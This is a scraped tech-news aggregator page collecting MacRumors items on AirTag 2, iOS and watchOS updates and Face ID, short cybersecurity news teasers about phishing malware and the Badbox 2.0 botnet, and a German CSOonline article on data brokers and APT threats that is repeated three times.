Skip to content
View in the app

A better way to browse. Learn more.
hosang I.T.

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Tech

Tech Articles from a wide variety of topics and categories
Show all categories

AirTag 2: These Airlines Offer Feature That Helps Find Your Lost Bags

Apple offers a Share Item Location feature in the Find My app that allows you to temporarily share the location of an AirTag-equipped item with others, including employees at participating airlines. This way, if you put an AirTag inside your bags, the airline can better help you find them in the event they are lost or delayed at the airport.


Given that Apple announced the AirTag 2 today, we have resurfaced a list of airlines that support the feature, but keep in mind that it also works with the original AirTag and third-party trackers with Find My support, such as those sold by Chipolo and Pebblebee.

Below, we have listed most of the airlines that support the feature:
AJet
Aer Lingus
Air Canada
Air France
Air India
Air New Zealand
American Airlines
Austrian Airlines
Breeze Airways
British Airways
Brussels Airlines
Cathay Pacific
Condor
Copa Airlines
China Airlines
Delta
Eurowings
Finnair
Flair Airlines
Iberia
JetBlue
KLM
LATAM Airlines
Lufthansa
Pegasus Airlines
Porter Airlines
Qantas
Saudia
Singapore Airlines
SunExpress
SWISS
Turkish Airlines
United
Virgin Atlantic
Vueling
WestJetIn its AirTag 2 press release, Apple said it has partnered with more than 50 airlines, so there should be around 15 more that support the feature soon.

How to Use the Feature

iPhone, iPad, and Mac users can generate a "Share Item Location" link in the Find My app. Anyone they share the link with can then view a web page with a location of the item on a map. The page will automatically update with the item's latest known location.


The item's location stops being shared "as soon as a user is reunited with their item," or automatically expires after seven days.

On the iPhone, the feature was introduced on iOS 18.2, but Apple says the AirTag 2 requires an iPhone running iOS 26.2.1 or later. If you are still running iOS 18.2 through iOS 18.7.4, you will need to use the original AirTag or a supported third-party tracker.

AirTag 2: Hands-On Photos

From the Tray Table's Zach Griff has shared some AirTag 2 hands-on photos.Tags: AirTag, Find My
This article, "AirTag 2: These Airlines Offer Feature That Helps Find Your Lost Bags" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Releases watchOS 26.2.1, Adding Precision Finding Support for AirTag 2

Apple today released watchOS 26.2.1, a minor update to the watchOS 26 update that came out last year. watchOS 26.2.1 comes six weeks after Apple released watchOS 26.2.


watchOS 26.2.1 can be downloaded for free on an iPhone running iOS 26.2.1 by opening up the Apple Watch app and going to General > Software Update, or initiating an update in the Settings app on the watch. To install the new software, the Apple Watch needs to have at least 50 percent battery and it needs to be placed on a charger.

Today's update enables Precision Finding for the new AirTag 2 on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later. Prior to now, Precision Finding for the AirTag has been limited to the ‌iPhone‌.

It is not yet clear if the update enables Precision Finding on Apple Watch for the original ‌AirTag‌, or if this is a feature limited to the new ‌AirTag‌ 2.

According to Apple's release notes, watchOS 26.2.1 also includes unspecified bug fixes.

Related Roundup: watchOS 26Related Forum: Apple Watch
This article, "Apple Releases watchOS 26.2.1, Adding Precision Finding Support for AirTag 2" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Releases iOS 26.2.1 With AirTag 2 Support

Apple today released iOS 26.2.1 and iPadOS 26.2.1, minor updates to the iOS 26 and iPadOS 26 operating systems. The new software comes a month after Apple released iOS 26.2 and iPadOS 26.2.


The new software can be downloaded on eligible iPhones and iPads over-the-air by going to Settings > General > Software Update.

iOS 26.2.1 adds support for the next-generation AirTag that Apple introduced today. The AirTag 2 features a second-generation Ultra Wideband chip, improving the Precision Finding feature.

The update also includes unspecified bug fixes, according to Apple's release notes.

Apple also released iOS 18.7.4, iOS 16.7.13, iOS 15.8.6, and iOS 12.5.8 for older iPhones unable to run ‌iOS 26‌. Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
This article, "Apple Releases iOS 26.2.1 With AirTag 2 Support" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Developing Thinner Face ID for iPhone Air 2, Report Suggests

Apple is developing a much thinner Face ID hardware module in an effort to reduce the space its facial authentication system takes up in the iPhone Air, a known leaker on China's Weibo social media platform today suggested.


According to Instant Digital, Apple has requested an "ultra-thin" Face ID component from suppliers that will allow the device to accommodate an ultra wide-angle lens in addition to the existing single main lens.

A redesign that includes a second camera is said to be one way that Apple thinks it can address user complaints that the iPhone Air, while an impressive design feat, has led to too many hardware compromises, especially given the $999 price tag.

Multiple technologies are housed in the plateau of the iPhone Air to maximize space for the battery, so Apple would presumably need to redesign the internals considerably to fit in another camera. Chinese leaker Digital Chat Station in November said Apple was focusing on making the device ultra-thin and lightweight in order to do just that.

The claim was soon followed by a report by The Information suggesting a second camera for the device was indeed in development.

For its rumored upcoming foldable iPhone, expected later this year, Apple has reportedly chosen to integrate Touch ID into the side button, rather than use Face ID, in order to make the device as slim as possible. Designing a smaller TrueDepth camera system could arguably see a next-generation model switch over to facial authentication.

Today's leaker speculates that an ultra-thin Face ID module could even eventually find its way into a MacBook, but there are no active rumors that indicate this is something Apple is working on.

In 2022, Bloomberg's Mark Gurman said Apple tested Face ID for the iMac, but the technology necessary to embed the authentication hardware into a thin notebook display simply wasn't available, and the biometric system has yet to be added to any Mac.

Around the same time, a marketing employee for Apple argued that Touch ID is more convenient, since the button is near your hands. Of course, that does not rule out the possibility of Apple adding Face ID to a Mac in the future.

The latest claim doesn't point to any imminent product changes – the second-generation iPhone Air is not expected until next year – but it does suggest Apple is actively reassessing how its Face ID hardware is packaged. Watch this space.Related Roundup: iPhone AirTags: Face ID, Instant DigitalBuyer's Guide: iPhone Air (Buy Now)
This article, "Apple Developing Thinner Face ID for iPhone Air 2, Report Suggests" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

New AirTag's Improved Precision Finding Requires These iPhone Models

The new AirTag that Apple unveiled today features a second-generation Ultra Wideband chip, enabling the Precision Finding feature to work up to 50% farther away from an item compared to the previous AirTag, according to Apple. However, you need a compatible iPhone model in order to take advantage of this improvement.


The improved Precision Finding requires one of these iPhone models:
iPhone 15
iPhone 15 Plus
iPhone 15 Pro
iPhone 15 Pro Max
iPhone 16
iPhone 16 Plus
iPhone 16 Pro
iPhone 16 Pro Max
iPhone 17
iPhone 17 Pro
iPhone 17 Pro Max
iPhone Air
Precision Finding at longer distances is limited to the iPhone models listed above because both the AirTag and the iPhone need Apple's second-generation Ultra Wideband chip, which was introduced starting with the iPhone 15 series.

Note that the lower-end iPhone 16e does not have a second-generation Ultra Wideband chip.

The new AirTag also has an upgraded Bluetooth chip for improved overall range outside of Precision Finding mode, with an iPhone 11 or newer.

The new AirTag is available to order on Apple.com and in the Apple Store app starting today, and it will be available at Apple Store locations later this week. In the U.S., pricing remains set at $29 for one AirTag and at $99 for four.Tag: AirTag
This article, "New AirTag's Improved Precision Finding Requires These iPhone Models" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Indian Users Targeted in Tax Phishing Campaign Delivering Blackmoon Malware

Cybersecurity researchers have discovered an ongoing campaign that's targeting Indian users with a multi-stage backdoor as part of a suspected cyber espionage campaign. The activity, per the eSentire Threat Response Unit (TRU), involves using phishing emails impersonating the Income Tax Department of India to trick victims into downloading a malicious archive, ultimately granting the threatView the full article
Hacker News

Digitale Integrität: Warum Firewall und IDS nicht reichen

Digineer Station – shutterstock.com
In einer vernetzten Geschäftswelt stehen Unternehmen vor beispiellosen Cybersicherheits-Herausforderungen. Laut dem IBM Cost of a Data Breach Report 2024 betragen die durchschnittlichen Kosten eines durch Phishing verursachten Datenlecks etwa 4,88 Millionen Dollar. Nach Branchenschätzungen werden täglich etwa 3,4 Milliarden Phishing-E-Mails verschickt. Gleichzeitig wächst die globale Datenhändlerbranche auf geschätzte 280 Milliarden Dollar im Jahr 2024. Diese Branche sammelt systematisch Informationen über Mitarbeiter, Kunden und Geschäftspartner – oft ohne deren Wissen. Traditionelle Sicherheitskonzepte wie Firewalls und Intrusion Detection reichen nicht mehr aus.
Die Grenzen von Firewall und Intrusion Detection
Eine Firewall ist unverzichtbar, hat jedoch fundamentale Einschränkungen: Sie ist hauptsächlich reaktiv und auf bekannte Bedrohungen konfiguriert. Bei täglich 300.000 neuen Malware- Varianten entstehen erhebliche Sicherheitslücken. Zudem konzentriert sie sich primär darauf, dass niemand ins Firmennetzwerk eindringt – die unkontrollierte Übertragung sensibler Daten nach außen bleibt oft unbemerkt.
Intrusion-Detection-Systeme (IDS) wiederum erkennen Eindringlinge erst, wenn diese bereits im System sind – vergleichbar mit einem Rauchmelder, der vor einem Brand warnt, ihn aber nicht verhindert. Advanced Persistent Threats (APTs) können so monatelang unentdeckt in Netzwerken verweilen.
Was die Datenindustrie über Ihr Unternehmen weiß
Data Broker sammeln systematisch Informationen, die weit über das hinausgehen, was Unternehmen bewusst ist. Nach Branchenberichten haben führende Data Broker personenbezogene Daten von schätzungsweise 70 Prozent der weltweiten Online-Bevölkerung erfasst. Der Marktwert dieser Branche beträgt 2024 rund 280 Milliarden Dollar – größer als der globale Cybersicherheitsmarkt.
Die gesammelten Daten betreffen nicht nur das Unternehmen selbst, sondern auch Mitarbeiter, Kunden und Geschäftspartner.
Das Gefährliche: Diese Daten fließen kontinuierlich und unbemerkt ab – durch alltägliche Internetnutzung am Arbeitsplatz. Jeder Webseitenbesuch, jede App-Nutzung, jedes vernetzte Gerät wird zum Datenlieferanten. Für herkömmliche Firewalls ist dieser Datenabfluss unsichtbar, da er als legitimer ausgehender Datenverkehr erscheint.
Über Mitarbeiter erfasst die Datenindustrie umfangreiche Informationen. Standort und Bewegungsmuster werden über die IP-Adresse beim Surfen ermittelt. Daraus entstehen detaillierte Profile darüber, welche Technologien ein Mitarbeiter recherchiert, an welchen Projekten er arbeitet und welche Wettbewerber er analysiert.
Auch die berufliche Rolle und Position werden erfasst: Tracker auf Karriereportalen wie LinkedIn und Xing registrieren Profilbesuche und Interaktionen, während Browser-Fingerprinting wiederkehrende Besucher auch ohne Cookies identifiziert. Die Kombination aus Firmendomain, Surfverhalten und Social-Media-Aktivitäten ermöglicht die Zuordnung zu konkreten Personen und ihren Entscheidungsbefugnissen. Hinsichtlich Kommunikationsmuster und Metadaten gilt: Selbst bei verschlüsselten E-Mails können alle Metadaten mitgelesen werden.
Über Kunden und Geschäftspartner werden ebenfalls sensible Informationen gesammelt. Geschäftsbeziehungen lassen sich ermitteln, wenn Mitarbeiter Kunden-Websites besuchen oder Partner- Portale nutzen, da eingebettete Tracker diese Verbindungen erfassen können und die Häufigkeit der Besuche die Intensität der Geschäftsbeziehung verrät. Projektinformationen werden sichtbar, weil Recherchen zu bestimmten Technologien, Branchen oder Märkten über Browser-Tracking protokolliert werden. Daraus lässt sich ableiten, an welchen Projekten gearbeitet wird und welche Investitionen geplant sind. Bei der Nutzung von Cloud-basierten CRM- Systemen, Projektmanagement-Tools oder Collaboration-Plattformen können eingebettete Analyse-Skripte zudem Informationen über verarbeitete Kundendaten erfassen.
Data Broker bieten ihre Datenbanken als legale Dienstleistung an, etwa für Hintergrundüberprüfungen, Marketing oder Kreditwürdigkeitsprüfungen. Das bedeutet: Auch Cyberkriminelle und staatliche Akteure können diese Daten problemlos erwerben.
Wie Cyberkriminelle diese Daten nutzen
Beim CEO Fraud (Chef-Betrug) geben sich Angreifer als Geschäftsführer oder Führungskräfte aus, um Mitarbeiter zur Überweisung von Geldern zu verleiten. Laut FBI führten zwischen 2013 und 2023 über 305.000 solcher Vorfälle zu weltweiten Verlusten von über 55 Milliarden Dollar. Die von Data Brokern gesammelten Informationen über Position, Reisepläne und aktuelle Projekte machen diese Angriffe erschreckend glaubwürdig. 2024 berichteten 64 Prozent der Unternehmen von solchen Angriffen.
Spear Phishing zielt im Gegensatz zu breit gestreutem Phishing auf spezifische Mitarbeiter. Mit Wissen über deren Rolle, Projekte und Kontakte erstellen Angreifer hochgradig personalisierte Nachrichten. Obwohl Spear-Phishing weniger als 0,1 Prozent des E-Mail-Volumens ausmacht, ist es für 66 Prozent aller Datenpannen verantwortlich.
Staatliche Akteure als zusätzliche Bedrohung
Neben Cyberkriminellen stellen staatlich finanzierte Hackergruppen eine wachsende Bedrohung für Unternehmen dar. Diese sogenannten Nation-State Actors verfügen über erhebliche Ressourcen und nutzen die von Data Brokern gesammelten Informationen für gezielte Wirtschaftsspionage und Sabotage.
Die Zahlen sind alarmierend: Laut CrowdStrike nahmen chinesische Cyber-Spionage-Aktivitäten 2024 um 150 Prozent zu, in bestimmten Branchen sogar um bis zu 300 Prozent. Das BSI registrierte 2024 durchschnittlich 309.000 neue Malware-Varianten pro Tag. Nach Angaben von Microsoft sind russische, chinesische, iranische und nordkoreanische Gruppen für den Großteil der staatlich unterstützten Cyberangriffe verantwortlich. Allein die bekannten APT-Gruppen (Advanced Persistent Threats) wie APT27, APT28, APT29, APT31, APT41, Lazarus Group und Kimsuky führen hunderte aktive Kampagnen gegen westliche Unternehmen durch.
Diese Gruppen nutzen die von Data Brokern verfügbaren Informationen zur präzisen Zielidentifikation, für Social-Engineering- Angriffe und zur langfristigen, unentdeckten Infiltration von Unternehmensnetzwerken. Die durchschnittliche Verweildauer eines APT in einem kompromittierten Netzwerk beträgt mehrere Monate – Zeit genug, um sensible Geschäftsgeheimnisse zu exfiltrieren.
Was digitale Integrität bedeutet
Digitale Integrität beschreibt die Unversehrtheit, Korrektheit und Vollständigkeit von Daten sowie das Recht, die digitale Identität und Kommunikation vor unbefugtem Zugriff zu schützen. Für Unternehmen bedeutet dies: Digitale Informationen dürfen nicht unbefugt verfälscht oder abgefangen werden. Mitarbeiter, Kunden und Geschäftspartner müssen darauf vertrauen können, dass ihre Daten geschützt sind.
Schutzmaßnahmen für Unternehmen
Security & Privacy Boxen sind eine Weiterentwicklung von Firewalls, die dazu beitragen können, den ungewollten Abfluss von Informationen aus dem Unternehmen deutlich zu reduzieren.
Entscheidend ist, dass die Lösung vertrauenswürdig ist: Kein Missbrauch als Überwachungsinstrument, Tracker können sich nicht freikaufen, und der Hersteller muss unabhängig von Werbeeinnahmen und Datenhandel sein.
Neben dem Einsatz einer Security & Privacy Box sollten CISOs aber weitere Maßnahmen implementieren. Dazu gehören regelmäßige Mitarbeiterschulungen zu Phishing und Social Engineering sowie das Eigen-Hosting sensibler Daten statt der Nutzung externer Cloud- Anbieter. Eine Zero-Trust-Architektur nach dem Prinzip ‚Vertraue niemandem, verifiziere alles’ bildet eine wichtige Grundlage.
Ergänzend sollte regelmäßig überprüft werden, welche Unternehmensdaten öffentlich zugänglich sind. (jm)
View the full article
CSOonline

Digitale Integrität: Warum Firewall und IDS nicht reichen

Digineer Station – shutterstock.com
In einer vernetzten Geschäftswelt stehen Unternehmen vor beispiellosen Cybersicherheits-Herausforderungen. Laut dem IBM Cost of a Data Breach Report 2024 betragen die durchschnittlichen Kosten eines durch Phishing verursachten Datenlecks etwa 4,88 Millionen Dollar. Nach Branchenschätzungen werden täglich etwa 3,4 Milliarden Phishing-E-Mails verschickt. Gleichzeitig wächst die globale Datenhändlerbranche auf geschätzte 280 Milliarden Dollar im Jahr 2024. Diese Branche sammelt systematisch Informationen über Mitarbeiter, Kunden und Geschäftspartner – oft ohne deren Wissen. Traditionelle Sicherheitskonzepte wie Firewalls und Intrusion Detection reichen nicht mehr aus.
Die Grenzen von Firewall und Intrusion Detection
Eine Firewall ist unverzichtbar, hat jedoch fundamentale Einschränkungen: Sie ist hauptsächlich reaktiv und auf bekannte Bedrohungen konfiguriert. Bei täglich 300.000 neuen Malware- Varianten entstehen erhebliche Sicherheitslücken. Zudem konzentriert sie sich primär darauf, dass niemand ins Firmennetzwerk eindringt – die unkontrollierte Übertragung sensibler Daten nach außen bleibt oft unbemerkt.
Intrusion-Detection-Systeme (IDS) wiederum erkennen Eindringlinge erst, wenn diese bereits im System sind – vergleichbar mit einem Rauchmelder, der vor einem Brand warnt, ihn aber nicht verhindert. Advanced Persistent Threats (APTs) können so monatelang unentdeckt in Netzwerken verweilen.
Was die Datenindustrie über Ihr Unternehmen weiß
Data Broker sammeln systematisch Informationen, die weit über das hinausgehen, was Unternehmen bewusst ist. Nach Branchenberichten haben führende Data Broker personenbezogene Daten von schätzungsweise 70 Prozent der weltweiten Online-Bevölkerung erfasst. Der Marktwert dieser Branche beträgt 2024 rund 280 Milliarden Dollar – größer als der globale Cybersicherheitsmarkt.
Die gesammelten Daten betreffen nicht nur das Unternehmen selbst, sondern auch Mitarbeiter, Kunden und Geschäftspartner.
Das Gefährliche: Diese Daten fließen kontinuierlich und unbemerkt ab – durch alltägliche Internetnutzung am Arbeitsplatz. Jeder Webseitenbesuch, jede App-Nutzung, jedes vernetzte Gerät wird zum Datenlieferanten. Für herkömmliche Firewalls ist dieser Datenabfluss unsichtbar, da er als legitimer ausgehender Datenverkehr erscheint.
Über Mitarbeiter erfasst die Datenindustrie umfangreiche Informationen. Standort und Bewegungsmuster werden über die IP-Adresse beim Surfen ermittelt. Daraus entstehen detaillierte Profile darüber, welche Technologien ein Mitarbeiter recherchiert, an welchen Projekten er arbeitet und welche Wettbewerber er analysiert.
Auch die berufliche Rolle und Position werden erfasst: Tracker auf Karriereportalen wie LinkedIn und Xing registrieren Profilbesuche und Interaktionen, während Browser-Fingerprinting wiederkehrende Besucher auch ohne Cookies identifiziert. Die Kombination aus Firmendomain, Surfverhalten und Social-Media-Aktivitäten ermöglicht die Zuordnung zu konkreten Personen und ihren Entscheidungsbefugnissen. Hinsichtlich Kommunikationsmuster und Metadaten gilt: Selbst bei verschlüsselten E-Mails können alle Metadaten mitgelesen werden.
Über Kunden und Geschäftspartner werden ebenfalls sensible Informationen gesammelt. Geschäftsbeziehungen lassen sich ermitteln, wenn Mitarbeiter Kunden-Websites besuchen oder Partner- Portale nutzen, da eingebettete Tracker diese Verbindungen erfassen können und die Häufigkeit der Besuche die Intensität der Geschäftsbeziehung verrät. Projektinformationen werden sichtbar, weil Recherchen zu bestimmten Technologien, Branchen oder Märkten über Browser-Tracking protokolliert werden. Daraus lässt sich ableiten, an welchen Projekten gearbeitet wird und welche Investitionen geplant sind. Bei der Nutzung von Cloud-basierten CRM- Systemen, Projektmanagement-Tools oder Collaboration-Plattformen können eingebettete Analyse-Skripte zudem Informationen über verarbeitete Kundendaten erfassen.
Data Broker bieten ihre Datenbanken als legale Dienstleistung an, etwa für Hintergrundüberprüfungen, Marketing oder Kreditwürdigkeitsprüfungen. Das bedeutet: Auch Cyberkriminelle und staatliche Akteure können diese Daten problemlos erwerben.
Wie Cyberkriminelle diese Daten nutzen
Beim CEO Fraud (Chef-Betrug) geben sich Angreifer als Geschäftsführer oder Führungskräfte aus, um Mitarbeiter zur Überweisung von Geldern zu verleiten. Laut FBI führten zwischen 2013 und 2023 über 305.000 solcher Vorfälle zu weltweiten Verlusten von über 55 Milliarden Dollar. Die von Data Brokern gesammelten Informationen über Position, Reisepläne und aktuelle Projekte machen diese Angriffe erschreckend glaubwürdig. 2024 berichteten 64 Prozent der Unternehmen von solchen Angriffen.
Spear Phishing zielt im Gegensatz zu breit gestreutem Phishing auf spezifische Mitarbeiter. Mit Wissen über deren Rolle, Projekte und Kontakte erstellen Angreifer hochgradig personalisierte Nachrichten. Obwohl Spear-Phishing weniger als 0,1 Prozent des E-Mail-Volumens ausmacht, ist es für 66 Prozent aller Datenpannen verantwortlich.
Staatliche Akteure als zusätzliche Bedrohung
Neben Cyberkriminellen stellen staatlich finanzierte Hackergruppen eine wachsende Bedrohung für Unternehmen dar. Diese sogenannten Nation-State Actors verfügen über erhebliche Ressourcen und nutzen die von Data Brokern gesammelten Informationen für gezielte Wirtschaftsspionage und Sabotage.
Die Zahlen sind alarmierend: Laut CrowdStrike nahmen chinesische Cyber-Spionage-Aktivitäten 2024 um 150 Prozent zu, in bestimmten Branchen sogar um bis zu 300 Prozent. Das BSI registrierte 2024 durchschnittlich 309.000 neue Malware-Varianten pro Tag. Nach Angaben von Microsoft sind russische, chinesische, iranische und nordkoreanische Gruppen für den Großteil der staatlich unterstützten Cyberangriffe verantwortlich. Allein die bekannten APT-Gruppen (Advanced Persistent Threats) wie APT27, APT28, APT29, APT31, APT41, Lazarus Group und Kimsuky führen hunderte aktive Kampagnen gegen westliche Unternehmen durch.
Diese Gruppen nutzen die von Data Brokern verfügbaren Informationen zur präzisen Zielidentifikation, für Social-Engineering– Angriffe und zur langfristigen, unentdeckten Infiltration von Unternehmensnetzwerken. Die durchschnittliche Verweildauer eines APT in einem kompromittierten Netzwerk beträgt mehrere Monate – Zeit genug, um sensible Geschäftsgeheimnisse zu exfiltrieren.
Was digitale Integrität bedeutet
Digitale Integrität beschreibt die Unversehrtheit, Korrektheit und Vollständigkeit von Daten sowie das Recht, die digitale Identität und Kommunikation vor unbefugtem Zugriff zu schützen. Für Unternehmen bedeutet dies: Digitale Informationen dürfen nicht unbefugt verfälscht oder abgefangen werden. Mitarbeiter, Kunden und Geschäftspartner müssen darauf vertrauen können, dass ihre Daten geschützt sind.
Schutzmaßnahmen für Unternehmen
Security & Privacy Boxen sind eine Weiterentwicklung von Firewalls, die dazu beitragen können, den ungewollten Abfluss von Informationen aus dem Unternehmen deutlich zu reduzieren.
Entscheidend ist, dass die Lösung vertrauenswürdig ist: Kein Missbrauch als Überwachungsinstrument, Tracker können sich nicht freikaufen, und der Hersteller muss unabhängig von Werbeeinnahmen und Datenhandel sein.
Neben dem Einsatz einer Security & Privacy Box sollten CISOs aber weitere Maßnahmen implementieren. Dazu gehören regelmäßige Mitarbeiterschulungen zu Phishing und Social Engineering sowie das Eigen-Hosting sensibler Daten statt der Nutzung externer Cloud- Anbieter. Eine Zero-Trust-Architektur nach dem Prinzip ‚Vertraue niemandem, verifiziere alles’ bildet eine wichtige Grundlage.
Ergänzend sollte regelmäßig überprüft werden, welche Unternehmensdaten öffentlich zugänglich sind. (jm)
View the full article
CSOonline

Digitale Integrität: Warum Firewall und IDS nicht reichen

Digineer Station – shutterstock.com
In einer vernetzten Geschäftswelt stehen Unternehmen vor beispiellosen Cybersicherheits-Herausforderungen. Laut dem IBM Cost of a Data Breach Report 2024 betragen die durchschnittlichen Kosten eines durch Phishing verursachten Datenlecks etwa 4,88 Millionen Dollar. Nach Branchenschätzungen werden täglich etwa 3,4 Milliarden Phishing-E-Mails verschickt. Gleichzeitig wächst die globale Datenhändlerbranche auf geschätzte 280 Milliarden Dollar im Jahr 2024. Diese Branche sammelt systematisch Informationen über Mitarbeiter, Kunden und Geschäftspartner – oft ohne deren Wissen. Traditionelle Sicherheitskonzepte wie Firewalls und Intrusion Detection reichen nicht mehr aus.
Die Grenzen von Firewall und Intrusion Detection
Eine Firewall ist unverzichtbar, hat jedoch fundamentale Einschränkungen: Sie ist hauptsächlich reaktiv und auf bekannte Bedrohungen konfiguriert. Bei täglich 300.000 neuen Malware- Varianten entstehen erhebliche Sicherheitslücken. Zudem konzentriert sie sich primär darauf, dass niemand ins Firmennetzwerk eindringt – die unkontrollierte Übertragung sensibler Daten nach außen bleibt oft unbemerkt.
Intrusion-Detection-Systeme (IDS) wiederum erkennen Eindringlinge erst, wenn diese bereits im System sind – vergleichbar mit einem Rauchmelder, der vor einem Brand warnt, ihn aber nicht verhindert. Advanced Persistent Threats (APTs) können so monatelang unentdeckt in Netzwerken verweilen.
Was die Datenindustrie über Ihr Unternehmen weiß
Data Broker sammeln systematisch Informationen, die weit über das hinausgehen, was Unternehmen bewusst ist. Nach Branchenberichten haben führende Data Broker personenbezogene Daten von schätzungsweise 70 Prozent der weltweiten Online-Bevölkerung erfasst. Der Marktwert dieser Branche beträgt 2024 rund 280 Milliarden Dollar – größer als der globale Cybersicherheitsmarkt.
Die gesammelten Daten betreffen nicht nur das Unternehmen selbst, sondern auch Mitarbeiter, Kunden und Geschäftspartner.
Das Gefährliche: Diese Daten fließen kontinuierlich und unbemerkt ab – durch alltägliche Internetnutzung am Arbeitsplatz. Jeder Webseitenbesuch, jede App-Nutzung, jedes vernetzte Gerät wird zum Datenlieferanten. Für herkömmliche Firewalls ist dieser Datenabfluss unsichtbar, da er als legitimer ausgehender Datenverkehr erscheint.
Über Mitarbeiter erfasst die Datenindustrie umfangreiche Informationen. Standort und Bewegungsmuster werden über die IP-Adresse beim Surfen ermittelt. Daraus entstehen detaillierte Profile darüber, welche Technologien ein Mitarbeiter recherchiert, an welchen Projekten er arbeitet und welche Wettbewerber er analysiert.
Auch die berufliche Rolle und Position werden erfasst: Tracker auf Karriereportalen wie LinkedIn und Xing registrieren Profilbesuche und Interaktionen, während Browser-Fingerprinting wiederkehrende Besucher auch ohne Cookies identifiziert. Die Kombination aus Firmendomain, Surfverhalten und Social-Media-Aktivitäten ermöglicht die Zuordnung zu konkreten Personen und ihren Entscheidungsbefugnissen. Hinsichtlich Kommunikationsmuster und Metadaten gilt: Selbst bei verschlüsselten E-Mails können alle Metadaten mitgelesen werden.
Über Kunden und Geschäftspartner werden ebenfalls sensible Informationen gesammelt. Geschäftsbeziehungen lassen sich ermitteln, wenn Mitarbeiter Kunden-Websites besuchen oder Partner- Portale nutzen, da eingebettete Tracker diese Verbindungen erfassen können und die Häufigkeit der Besuche die Intensität der Geschäftsbeziehung verrät. Projektinformationen werden sichtbar, weil Recherchen zu bestimmten Technologien, Branchen oder Märkten über Browser-Tracking protokolliert werden. Daraus lässt sich ableiten, an welchen Projekten gearbeitet wird und welche Investitionen geplant sind. Bei der Nutzung von Cloud-basierten CRM- Systemen, Projektmanagement-Tools oder Collaboration-Plattformen können eingebettete Analyse-Skripte zudem Informationen über verarbeitete Kundendaten erfassen.
Data Broker bieten ihre Datenbanken als legale Dienstleistung an, etwa für Hintergrundüberprüfungen, Marketing oder Kreditwürdigkeitsprüfungen. Das bedeutet: Auch Cyberkriminelle und staatliche Akteure können diese Daten problemlos erwerben.
Wie Cyberkriminelle diese Daten nutzen
Beim CEO Fraud (Chef-Betrug) geben sich Angreifer als Geschäftsführer oder Führungskräfte aus, um Mitarbeiter zur Überweisung von Geldern zu verleiten. Laut FBI führten zwischen 2013 und 2023 über 305.000 solcher Vorfälle zu weltweiten Verlusten von über 55 Milliarden Dollar. Die von Data Brokern gesammelten Informationen über Position, Reisepläne und aktuelle Projekte machen diese Angriffe erschreckend glaubwürdig. 2024 berichteten 64 Prozent der Unternehmen von solchen Angriffen.
Spear Phishing zielt im Gegensatz zu breit gestreutem Phishing auf spezifische Mitarbeiter. Mit Wissen über deren Rolle, Projekte und Kontakte erstellen Angreifer hochgradig personalisierte Nachrichten. Obwohl Spear-Phishing weniger als 0,1 Prozent des E-Mail-Volumens ausmacht, ist es für 66 Prozent aller Datenpannen verantwortlich.
Staatliche Akteure als zusätzliche Bedrohung
Neben Cyberkriminellen stellen staatlich finanzierte Hackergruppen eine wachsende Bedrohung für Unternehmen dar. Diese sogenannten Nation-State Actors verfügen über erhebliche Ressourcen und nutzen die von Data Brokern gesammelten Informationen für gezielte Wirtschaftsspionage und Sabotage.
Die Zahlen sind alarmierend: Laut CrowdStrike nahmen chinesische Cyber-Spionage-Aktivitäten 2024 um 150 Prozent zu, in bestimmten Branchen sogar um bis zu 300 Prozent. Das BSI registrierte 2024 durchschnittlich 309.000 neue Malware-Varianten pro Tag. Nach Angaben von Microsoft sind russische, chinesische, iranische und nordkoreanische Gruppen für den Großteil der staatlich unterstützten Cyberangriffe verantwortlich. Allein die bekannten APT-Gruppen (Advanced Persistent Threats) wie APT27, APT28, APT29, APT31, APT41, Lazarus Group und Kimsuky führen hunderte aktive Kampagnen gegen westliche Unternehmen durch.
Diese Gruppen nutzen die von Data Brokern verfügbaren Informationen zur präzisen Zielidentifikation, für Social-Engineering– Angriffe und zur langfristigen, unentdeckten Infiltration von Unternehmensnetzwerken. Die durchschnittliche Verweildauer eines APT in einem kompromittierten Netzwerk beträgt mehrere Monate – Zeit genug, um sensible Geschäftsgeheimnisse zu exfiltrieren.
Was digitale Integrität bedeutet
Digitale Integrität beschreibt die Unversehrtheit, Korrektheit und Vollständigkeit von Daten sowie das Recht, die digitale Identität und Kommunikation vor unbefugtem Zugriff zu schützen. Für Unternehmen bedeutet dies: Digitale Informationen dürfen nicht unbefugt verfälscht oder abgefangen werden. Mitarbeiter, Kunden und Geschäftspartner müssen darauf vertrauen können, dass ihre Daten geschützt sind.
Schutzmaßnahmen für Unternehmen
Security & Privacy Boxen sind eine Weiterentwicklung von Firewalls, die dazu beitragen können, den ungewollten Abfluss von Informationen aus dem Unternehmen deutlich zu reduzieren.
Entscheidend ist, dass die Lösung vertrauenswürdig ist: Kein Missbrauch als Überwachungsinstrument, Tracker können sich nicht freikaufen, und der Hersteller muss unabhängig von Werbeeinnahmen und Datenhandel sein.
Neben dem Einsatz einer Security & Privacy Box sollten CISOs aber weitere Maßnahmen implementieren. Dazu gehören regelmäßige Mitarbeiterschulungen zu Phishing und Social Engineering sowie das Eigen-Hosting sensibler Daten statt der Nutzung externer Cloud- Anbieter. Eine Zero-Trust-Architektur nach dem Prinzip ‚Vertraue niemandem, verifiziere alles’ bildet eine wichtige Grundlage.
Ergänzend sollte regelmäßig überprüft werden, welche Unternehmensdaten öffentlich zugänglich sind. (jm)
View the full article
CSOonline

Who Operates the Badbox 2.0 Botnet?

The cybercriminals in control of Kimwolf — a disruptive botnet that has infected more than 2 million devices — recently shared a screenshot indicating they’d compromised the control panel for Badbox 2.0, a vast China-based botnet powered by malicious software that comes pre-installed on many Android TV streaming boxes. Both the FBI and Google say they are hunting for the people behind Badbox 2.0, and thanks to bragging by the Kimwolf botmasters we may now have a much clearer idea about that.
